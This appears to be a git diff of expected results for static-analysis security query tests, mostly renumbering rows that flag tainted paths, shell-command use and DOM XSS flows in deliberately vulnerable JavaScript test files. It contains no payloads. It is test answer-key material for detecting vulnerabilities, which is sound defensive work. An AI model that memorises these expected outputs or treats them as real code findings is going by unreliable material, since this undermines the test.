| tainted-require.js:6:19:6:37 | req.param("module") | user-provided value | +| tainted-require.js:11:29:11:47 | req.param("module") | tainted-require.js:11:29:11:47 | req.param("module") | tainted-require.js:11:29:11:47 | req.param("module") | This path depends on a $@. | tainted-require.js:11:29:11:47 | req.param("module") | user-provided value | +| tainted-require.js:13:11:13:29 | req.param("module") | tainted-require.js:13:11:13:29 | req.param("module") | tainted-require.js:13:11:13:29 | req.param("module") | This path depends on a $@. | tainted-require.js:13:11:13:29 | req.param("module") | user-provided value | +| tainted-sendFile.js:7:16:7:33 | req.param("gimme") | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | user-provided value | | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:10:16:10:33 | req.param("gimme") | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:10:16:10:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:18:43:18:58 | req.param("dir") | tainted-sendFile.js:18:43:18:58 | req.param("dir") | tainted-sendFile.js:18:43:18:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:18:43:18:58 | req.param("dir") | user-provided value | -| tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | tainted-sendFile.js:24:37:24:48 | req.params.x | tainted-sendFile.js:24:16:24:49 | path.re ... rams.x) | This path depends on a $@. 
| tainted-sendFile.js:24:37:24:48 | req.params.x | user-provided value | -| tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | tainted-sendFile.js:25:34:25:45 | req.params.x | tainted-sendFile.js:25:16:25:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:25:34:25:45 | req.params.x | user-provided value | -| tainted-sendFile.js:30:16:30:33 | req.param("gimme") | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:30:16:30:33 | req.param("gimme") | user-provided value | -| tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | tainted-sendFile.js:33:37:33:48 | req.params.x | tainted-sendFile.js:33:16:33:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:33:37:33:48 | req.params.x | user-provided value | -| tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | tainted-sendFile.js:35:34:35:45 | req.params.x | tainted-sendFile.js:35:16:35:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:35:34:35:45 | req.params.x | user-provided value | -| tainted-sendFile.js:38:43:38:58 | req.param("dir") | tainted-sendFile.js:38:43:38:58 | req.param("dir") | tainted-sendFile.js:38:43:38:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:38:43:38:58 | req.param("dir") | user-provided value | +| tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:15:43:15:58 | req.param("dir") | user-provided value | +| tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | This path depends on a $@. | tainted-sendFile.js:21:37:21:48 | req.params.x | user-provided value | +| tainted-sendFile.js:22:16:22:46 | path.jo ... 
rams.x) | tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:22:34:22:45 | req.params.x | user-provided value | +| tainted-sendFile.js:27:16:27:33 | req.param("gimme") | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:27:16:27:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | tainted-sendFile.js:30:37:30:48 | req.params.x | tainted-sendFile.js:30:16:30:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:30:37:30:48 | req.params.x | user-provided value | +| tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | tainted-sendFile.js:32:34:32:45 | req.params.x | tainted-sendFile.js:32:16:32:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:32:34:32:45 | req.params.x | user-provided value | +| tainted-sendFile.js:35:43:35:58 | req.param("dir") | tainted-sendFile.js:35:43:35:58 | req.param("dir") | tainted-sendFile.js:35:43:35:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:35:43:35:58 | req.param("dir") | user-provided value | | tainted-string-steps.js:8:18:8:34 | path.substring(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:8:18:8:34 | path.substring(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:10:18:10:31 | path.substr(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:10:18:10:31 | path.substr(4) | This path depends on a $@. 
| tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | 
@@ -1141,8 +1141,8 @@ subpaths | tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | tainted-string-steps.js:27:18:27:36 | path.split(unknown) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:27:18:27:36 | path.split(unknown) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | | torrents.js:7:25:7:27 | loc | torrents.js:5:13:5:38 | parseTo ... t).name | torrents.js:7:25:7:27 | loc | This path depends on a $@. | torrents.js:5:13:5:38 | parseTo ... t).name | user-provided value | -| typescript.ts:12:29:12:32 | path | typescript.ts:9:24:9:30 | req.url | typescript.ts:12:29:12:32 | path | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:21:39:21:43 | path3 | typescript.ts:9:24:9:30 | req.url | typescript.ts:21:39:21:43 | path3 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:24:39:24:43 | path4 | typescript.ts:9:24:9:30 | req.url | typescript.ts:24:39:24:43 | path4 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | -| typescript.ts:32:29:32:33 | path6 | typescript.ts:9:24:9:30 | req.url | typescript.ts:32:29:32:33 | path6 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:11:29:11:32 | path | typescript.ts:9:24:9:30 | req.url | typescript.ts:11:29:11:32 | path | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:20:39:20:43 | path3 | typescript.ts:9:24:9:30 | req.url | typescript.ts:20:39:20:43 | path3 | This path depends on a $@. 
| typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:23:39:23:43 | path4 | typescript.ts:9:24:9:30 | req.url | typescript.ts:23:39:23:43 | path4 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:31:29:31:33 | path6 | typescript.ts:9:24:9:30 | req.url | typescript.ts:31:29:31:33 | path6 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | | views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | This path depends on a $@. | views.js:1:43:1:55 | req.params[0] | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected index 1a561b8fc416..820d8af4767d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/UselessUseOfCat.expected @@ -78,7 +78,7 @@ options | uselesscat.js:86:1:86:75 | execFil ... utf8'}) | uselesscat.js:86:57:86:74 | {encoding: 'utf8'} | | uselesscat.js:100:1:100:56 | execFil ... ptions) | uselesscat.js:100:42:100:55 | unknownOptions | | uselesscat.js:111:1:111:51 | spawn(' ... it'] }) | uselesscat.js:111:14:111:50 | { stdio ... rit'] } | -| uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | uselesscat.js:136:51:138:1 | { // NO ... utf8'\\n} | +| uselesscat.js:136:17:138:2 | execSyn ... tf8'\\n}) | uselesscat.js:136:51:138:1 | { // $ ... utf8'\\n} | | uselesscat.js:147:1:147:47 | shelljs ... utf8'}) | uselesscat.js:147:29:147:46 | {encoding: 'utf8'} | | uselesscat.js:151:1:151:48 | cspawn( ... tf8' }) | uselesscat.js:151:28:151:47 | { encoding: 'utf8' } | | uselesscat.js:156:1:156:35 | cspawn( ... tf8' }) | uselesscat.js:156:15:156:34 | { encoding: 'utf8' } | 
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected index eb46033824f4..9b8f27cdc70c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected +++ b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/Xss.expected @@ -152,7 +152,7 @@ nodes | dragAndDrop.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | | event-handler-receiver.js:2:31:2:83 | '

    ' | semmle.label | '

    ' | | event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | -| express.js:7:15:7:33 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:6:15:6:33 | req.param("wobble") | semmle.label | req.param("wobble") | | jquery.js:2:7:2:40 | tainted | semmle.label | tainted | | jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | | jquery.js:4:5:4:11 | tainted | semmle.label | tainted | @@ -202,8 +202,8 @@ nodes | jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | | jwt-server.js:9:16:9:20 | taint | semmle.label | taint | | jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:25 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:29 | decoded.foo | semmle.label | decoded.foo | +| jwt-server.js:10:19:10:25 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:29 | decoded.foo | semmle.label | decoded.foo | | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | semmle.label | `Hi, yo ... sage}.` | | nodemailer.js:13:50:13:66 | req.query.message | semmle.label | req.query.message | | optionalSanitizer.js:2:7:2:39 | target | semmle.label | target | 
@@ -343,9 +343,9 @@ nodes | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:9:27:9:38 | searchParams | semmle.label | searchParams | -| translate.js:9:27:9:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:9:27:9:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | +| translate.js:8:27:8:38 | searchParams | semmle.label | searchParams | +| translate.js:8:27:8:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:8:27:8:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | | trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | | trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | | trusted-types.js:3:62:3:62 | x | semmle.label | x | @@ -368,240 +368,240 @@ nodes | tst3.js:10:38:10:43 | data.p | semmle.label | data.p | | tst.js:2:7:2:39 | target | semmle.label | target | | tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:5:18:5:23 | target | semmle.label | target | -| tst.js:8:18:8:126 | "" | semmle.label | "" | -| tst.js:8:37:8:58 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:12:5:12:42 | '
    ' | semmle.label | '
    ' | -| tst.js:12:28:12:33 | target | semmle.label | target | -| tst.js:17:7:17:56 | params | semmle.label | params | -| tst.js:17:7:17:56 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | -| tst.js:17:16:17:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:17:25:17:41 | document.location | semmle.label | document.location | -| tst.js:18:18:18:23 | params | semmle.label | params | -| tst.js:18:18:18:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:18:18:18:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:20:7:20:61 | searchParams | semmle.label | searchParams | -| tst.js:20:7:20:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:20:22:20:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... 
ing(1)) [MapValue] | -| tst.js:20:42:20:47 | target | semmle.label | target | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:21:18:21:29 | searchParams | semmle.label | searchParams | -| tst.js:21:18:21:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:21:18:21:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | -| tst.js:24:14:24:19 | target | semmle.label | target | -| tst.js:26:18:26:23 | target | semmle.label | target | -| tst.js:28:5:28:28 | documen ... .search | semmle.label | documen ... .search | -| tst.js:31:10:31:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:34:16:34:20 | bar() | semmle.label | bar() | -| tst.js:36:14:36:14 | x | semmle.label | x | -| tst.js:37:10:37:10 | x | semmle.label | x | -| tst.js:40:16:40:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | -| tst.js:40:20:40:43 | documen ... .search | semmle.label | documen ... .search | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:43:10:43:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:46:16:46:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:4:18:4:23 | target | semmle.label | target | +| tst.js:6:18:6:126 | "" | semmle.label | "" | +| tst.js:6:37:6:58 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:9:5:9:42 | '
    ' | semmle.label | '
    ' | +| tst.js:9:28:9:33 | target | semmle.label | target | +| tst.js:14:7:14:56 | params | semmle.label | params | +| tst.js:14:7:14:56 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | +| tst.js:14:16:14:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:14:25:14:41 | document.location | semmle.label | document.location | +| tst.js:15:18:15:23 | params | semmle.label | params | +| tst.js:15:18:15:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:15:18:15:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:17:7:17:61 | searchParams | semmle.label | searchParams | +| tst.js:17:7:17:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:17:22:17:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... 
ing(1)) [MapValue] | +| tst.js:17:42:17:47 | target | semmle.label | target | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:18:18:18:29 | searchParams | semmle.label | searchParams | +| tst.js:18:18:18:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:18:18:18:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | +| tst.js:21:14:21:19 | target | semmle.label | target | +| tst.js:22:18:22:23 | target | semmle.label | target | +| tst.js:24:5:24:28 | documen ... .search | semmle.label | documen ... .search | +| tst.js:27:10:27:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:29:16:29:20 | bar() | semmle.label | bar() | +| tst.js:31:14:31:14 | x | semmle.label | x | +| tst.js:32:10:32:10 | x | semmle.label | x | +| tst.js:34:16:34:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | +| tst.js:34:20:34:43 | documen ... .search | semmle.label | documen ... .search | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:37:10:37:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:39:16:39:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:39:21:39:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:41:15:41:15 | s | semmle.label | s | +| tst.js:43:12:43:12 | s | semmle.label | s | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:46:16:46:45 | chop(do ... search) | semmle.label | chop(do ... search) | | tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:48:15:48:15 | s | semmle.label | s | -| tst.js:50:12:50:12 | s | semmle.label | s | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:54:16:54:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:56:16:56:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:58:16:58:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:26:58:30 | bar() | semmle.label | bar() | -| tst.js:60:34:60:34 | s | semmle.label | s | -| tst.js:62:18:62:18 | s | semmle.label | s | -| tst.js:64:25:64:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:65:25:65:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:68:16:68:20 | bar() | semmle.label | bar() | -| tst.js:70:1:70:27 | [,docum ... 
search] [1] | semmle.label | [,docum ... search] [1] | -| tst.js:70:3:70:26 | documen ... .search | semmle.label | documen ... .search | -| tst.js:70:46:70:46 | x | semmle.label | x | -| tst.js:73:20:73:20 | x | semmle.label | x | -| tst.js:77:49:77:72 | documen ... .search | semmle.label | documen ... .search | -| tst.js:81:26:81:49 | documen ... .search | semmle.label | documen ... .search | -| tst.js:82:25:82:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:84:33:84:56 | documen ... .search | semmle.label | documen ... .search | -| tst.js:85:32:85:55 | documen ... .search | semmle.label | documen ... .search | -| tst.js:90:39:90:62 | documen ... .search | semmle.label | documen ... .search | -| tst.js:96:30:96:53 | documen ... .search | semmle.label | documen ... .search | -| tst.js:102:25:102:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:7:107:44 | v | semmle.label | v | -| tst.js:107:11:107:34 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:11:107:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:110:18:110:18 | v | semmle.label | v | -| tst.js:136:18:136:18 | v | semmle.label | v | -| tst.js:148:29:148:50 | window. ... .search | semmle.label | window. ... .search | -| tst.js:151:29:151:29 | v | semmle.label | v | -| tst.js:151:49:151:49 | v | semmle.label | v | -| tst.js:155:29:155:46 | xssSourceService() | semmle.label | xssSourceService() | -| tst.js:158:40:158:61 | window. ... .search | semmle.label | window. ... .search | -| tst.js:177:9:177:41 | target | semmle.label | target | -| tst.js:177:18:177:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:180:28:180:33 | target | semmle.label | target | -| tst.js:184:9:184:42 | tainted | semmle.label | tainted | -| tst.js:184:19:184:42 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:186:31:186:37 | tainted | semmle.label | tainted | -| tst.js:188:42:188:48 | tainted | semmle.label | tainted | -| tst.js:189:33:189:39 | tainted | semmle.label | tainted | -| tst.js:191:54:191:60 | tainted | semmle.label | tainted | -| tst.js:192:45:192:51 | tainted | semmle.label | tainted | -| tst.js:193:49:193:55 | tainted | semmle.label | tainted | -| tst.js:197:9:197:42 | tainted | semmle.label | tainted | -| tst.js:197:19:197:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:199:67:199:73 | tainted | semmle.label | tainted | -| tst.js:200:67:200:73 | tainted | semmle.label | tainted | -| tst.js:204:35:204:41 | tainted | semmle.label | tainted | -| tst.js:206:46:206:52 | tainted | semmle.label | tainted | -| tst.js:207:38:207:44 | tainted | semmle.label | tainted | -| tst.js:208:35:208:41 | tainted | semmle.label | tainted | -| tst.js:212:28:212:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | -| tst.js:213:28:213:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | -| tst.js:214:28:214:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | -| tst.js:218:32:218:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | -| tst.js:225:28:225:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | -| tst.js:226:28:226:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | -| tst.js:227:28:227:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | -| tst.js:231:32:231:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | -| tst.js:236:35:236:41 | tainted | semmle.label | tainted | -| tst.js:238:20:238:26 | tainted | semmle.label | tainted | -| tst.js:240:23:240:29 | tainted | semmle.label | tainted | -| tst.js:241:23:241:29 | tainted | semmle.label | tainted | -| tst.js:247:39:247:55 | props.propTainted | semmle.label | props.propTainted | -| tst.js:251:60:251:82 | this.st ... Tainted | semmle.label | this.st ... 
Tainted | -| tst.js:255:23:255:29 | tainted | semmle.label | tainted | -| tst.js:259:7:259:17 | window.name | semmle.label | window.name | -| tst.js:260:7:260:10 | name | semmle.label | name | -| tst.js:264:11:264:21 | window.name | semmle.label | window.name | -| tst.js:280:22:280:29 | location | semmle.label | location | -| tst.js:285:9:285:29 | tainted | semmle.label | tainted | -| tst.js:285:19:285:29 | window.name | semmle.label | window.name | -| tst.js:288:59:288:65 | tainted | semmle.label | tainted | -| tst.js:301:9:301:16 | location | semmle.label | location | -| tst.js:302:10:302:10 | e | semmle.label | e | -| tst.js:303:20:303:20 | e | semmle.label | e | -| tst.js:308:10:308:17 | location | semmle.label | location | -| tst.js:310:10:310:10 | e | semmle.label | e | -| tst.js:311:20:311:20 | e | semmle.label | e | -| tst.js:316:35:316:42 | location | semmle.label | location | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:327:18:327:34 | document.location | semmle.label | document.location | -| tst.js:331:7:331:43 | params | semmle.label | params | -| tst.js:331:7:331:43 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | -| tst.js:331:16:331:43 | getTain ... hParams | semmle.label | getTain ... hParams | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... 
hParams [MapValue] | -| tst.js:332:18:332:23 | params | semmle.label | params | -| tst.js:332:18:332:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:332:18:332:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | -| tst.js:341:20:341:36 | document.location | semmle.label | document.location | -| tst.js:343:5:343:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | -| tst.js:343:5:343:17 | getUrl().hash | semmle.label | getUrl().hash | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | -| tst.js:348:7:348:39 | target | semmle.label | target | -| tst.js:348:16:348:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:349:12:349:17 | target | semmle.label | target | -| tst.js:355:10:355:42 | target | semmle.label | target | -| tst.js:355:19:355:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:356:16:356:21 | target | semmle.label | target | -| tst.js:357:20:357:25 | target | semmle.label | target | -| tst.js:360:21:360:26 | target | semmle.label | target | -| tst.js:363:18:363:23 | target | semmle.label | target | -| tst.js:371:7:371:39 | target | semmle.label | target | -| tst.js:371:16:371:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:374:18:374:23 | target | semmle.label | target | -| tst.js:381:7:381:39 | target | semmle.label | target | -| tst.js:381:16:381:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:384:18:384:23 | target | semmle.label | target | -| tst.js:386:18:386:23 | target | semmle.label | target | -| tst.js:386:18:386:29 | target.taint | semmle.label | target.taint | -| tst.js:391:3:391:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | -| tst.js:391:19:391:42 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:392:18:392:23 | target [taint3] | semmle.label | target [taint3] | -| tst.js:392:18:392:30 | target.taint3 | semmle.label | target.taint3 | -| tst.js:397:18:397:23 | target | semmle.label | target | -| tst.js:397:18:397:30 | target.taint5 | semmle.label | target.taint5 | -| tst.js:406:18:406:23 | target | semmle.label | target | -| tst.js:406:18:406:30 | target.taint7 | semmle.label | target.taint7 | -| tst.js:408:3:408:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | -| tst.js:408:19:408:24 | target | semmle.label | target | -| tst.js:408:19:408:24 | target [taint8] | semmle.label | target [taint8] | -| tst.js:408:19:408:31 | target.taint8 | semmle.label | target.taint8 | -| tst.js:409:18:409:23 | target [taint8] | semmle.label | target [taint8] | -| tst.js:409:18:409:30 | target.taint8 | semmle.label | target.taint8 | -| tst.js:416:7:416:46 | payload | semmle.label | payload | -| tst.js:416:17:416:36 | window.location.hash | semmle.label | window.location.hash | -| tst.js:416:17:416:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst.js:417:18:417:24 | payload | semmle.label | payload | -| tst.js:419:7:419:55 | match | semmle.label | match | -| tst.js:419:15:419:34 | window.location.hash | semmle.label | window.location.hash | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | -| tst.js:421:20:421:24 | match | semmle.label | match | -| tst.js:421:20:421:27 | match[1] | semmle.label | match[1] | -| tst.js:424:18:424:37 | window.location.hash | semmle.label | window.location.hash | -| tst.js:424:18:424:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | -| tst.js:424:18:424:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | -| 